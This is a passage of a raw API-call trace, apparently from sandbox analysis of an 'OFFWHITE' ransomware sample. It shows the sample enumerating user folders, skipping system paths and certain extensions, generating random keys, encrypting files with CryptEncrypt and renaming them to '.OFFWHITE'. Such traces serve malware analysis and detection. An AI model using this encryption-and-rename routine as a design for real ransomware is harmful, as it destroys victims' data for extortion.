lpString2=".cpl") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.205] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44b57350, ftCreationTime.dwHighDateTime=0x1d5e387, ftLastAccessTime.dwLowDateTime=0xc0933ec0, ftLastAccessTime.dwHighDateTime=0x1d5e65d, ftLastWriteTime.dwLowDateTime=0xc0933ec0, ftLastWriteTime.dwHighDateTime=0x1d5e65d, nFileSizeHigh=0x0, nFileSizeLow=0x16e0c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="VwYkmY_OUr.wav", cAlternateFileName="VWYKMY~1.WAV")) returned 1 [0135.205] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2=".") returned 1 [0135.205] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="..") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="...") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="windows") returned -1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="$recycle.bin") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="rsa") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="ntuser.dat") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="programdata") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="appdata") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="program files") returned 1 [0135.206] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="program files (x86)") returned 1 [0135.206] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0135.206] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="VwYkmY_OUr.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav" [0135.206] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.206] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.206] PathFindExtensionW (pszPath="VwYkmY_OUr.wav") returned=".wav" [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.206] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.207] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.207] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.207] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.207] lstrcmpiW (lpString1="VwYkmY_OUr.wav", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.207] GetProcessHeap () returned 0x500000 [0135.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531930 [0135.207] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vwykmy_our.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.207] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=93708) returned 1 [0135.207] GetProcessHeap () returned 0x500000 [0135.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.207] GetProcessHeap () returned 0x500000 [0135.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.207] GetProcessHeap () returned 0x500000 [0135.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.207] GetProcessHeap () returned 0x500000 [0135.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.207] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.207] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.208] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.208] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.208] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.208] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.208] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.208] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.208] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.208] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.208] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.208] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.208] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16e0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.208] SetLastError (dwErrCode=0x0) [0135.208] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.210] GetLastError () returned 0x0 [0135.210] GetLastError () returned 0x0 [0135.210] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16f0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.211] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.211] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1700c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.211] WriteFile (in: hFile=0xb0, lpBuffer=0x531930*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531930*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.211] GetProcessHeap () returned 0x500000 [0135.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16e0c) returned 0x55a7b8 [0135.211] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.211] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x16e0c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x16e0c, lpOverlapped=0x0) returned 1 [0135.218] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.218] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x16e0c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x16e0c, lpOverlapped=0x0) returned 1 [0135.218] GetProcessHeap () returned 0x500000 [0135.218] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.218] CloseHandle (hObject=0xb0) returned 1 [0135.222] GetProcessHeap () returned 0x500000 [0135.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.222] GetProcessHeap () returned 0x500000 [0135.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.222] GetProcessHeap () returned 0x500000 [0135.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.222] GetProcessHeap () returned 0x500000 [0135.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.222] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav" [0135.222] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav.OFFWHITE" [0135.222] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vwykmy_our.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\VwYkmY_OUr.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vwykmy_our.wav.offwhite")) returned 1 [0135.223] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44b57350, ftCreationTime.dwHighDateTime=0x1d5e387, ftLastAccessTime.dwLowDateTime=0xc0933ec0, ftLastAccessTime.dwHighDateTime=0x1d5e65d, ftLastWriteTime.dwLowDateTime=0xc0933ec0, ftLastWriteTime.dwHighDateTime=0x1d5e65d, nFileSizeHigh=0x0, nFileSizeLow=0x16e0c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="VwYkmY_OUr.wav", cAlternateFileName="VWYKMY~1.WAV")) returned 0 [0135.223] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0135.223] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="...") returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="$recycle.bin") returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="rsa") returned -1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="ntuser.dat") returned -1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="programdata") returned -1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="appdata") returned 1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="program files") returned -1 [0135.223] lstrcmpiW (lpString1="My Documents", lpString2="program files (x86)") returned -1 [0135.223] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.223] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0135.223] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0135.223] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0135.223] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*" [0135.224] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44b57350, ftCreationTime.dwHighDateTime=0x1d5e387, ftLastAccessTime.dwLowDateTime=0xc0933ec0, ftLastAccessTime.dwHighDateTime=0x1d5e65d, ftLastWriteTime.dwLowDateTime=0xc0933ec0, ftLastWriteTime.dwHighDateTime=0x1d5e65d, nFileSizeHigh=0x0, nFileSizeLow=0x16e0c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="VwYkmY_OUr.wav", cAlternateFileName="VWYKMY~1.WAV")) returned 0xffffffff [0135.224] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="...") returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="$recycle.bin") returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="rsa") returned -1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="ntuser.dat") returned -1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="programdata") returned -1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="appdata") returned 1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="program files") returned -1 [0135.224] lstrcmpiW (lpString1="NetHood", lpString2="program files (x86)") returned -1 [0135.224] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.224] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0135.224] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0135.224] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0135.224] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0135.224] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44b57350, ftCreationTime.dwHighDateTime=0x1d5e387, ftLastAccessTime.dwLowDateTime=0xc0933ec0, ftLastAccessTime.dwHighDateTime=0x1d5e65d, ftLastWriteTime.dwLowDateTime=0xc0933ec0, ftLastWriteTime.dwHighDateTime=0x1d5e65d, nFileSizeHigh=0x0, nFileSizeLow=0x16e0c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="VwYkmY_OUr.wav", cAlternateFileName="VWYKMY~1.WAV")) returned 0xffffffff [0135.225] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="...") returned 1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$recycle.bin") returned 1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="rsa") returned -1 [0135.225] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0135.225] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="...") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="windows") returned -1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="$recycle.bin") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="rsa") returned -1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="programdata") returned -1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="appdata") returned 1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="program files") returned -1 [0135.225] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="program files (x86)") returned -1 [0135.225] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.225] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0135.225] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.225] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.225] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".exe") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".log") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".cab") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".cmd") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".com") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".cpl") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".ini") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".dll") returned 1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".url") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".ttf") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".mp3") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".pif") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".mp4") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".OFFWHITE") returned -1 [0135.226] lstrcmpiW (lpString1=".LOG1", lpString2=".msi") returned -1 [0135.226] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.226] GetProcessHeap () returned 0x500000 [0135.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531940 [0135.226] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.227] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0135.227] GetProcessHeap () returned 0x500000 [0135.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.227] GetProcessHeap () returned 0x500000 [0135.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.227] GetProcessHeap () returned 0x500000 [0135.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.227] GetProcessHeap () returned 0x500000 [0135.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.227] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.227] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.227] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e990*=0x100) returned 1 [0135.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.228] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e98c*=0x100) returned 1 [0135.228] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.228] SetLastError (dwErrCode=0x0) [0135.228] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5243b8, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0135.228] GetLastError () returned 0x6 [0135.228] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="...") returned 1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="windows") returned -1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="$recycle.bin") returned 1 [0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="rsa") returned -1 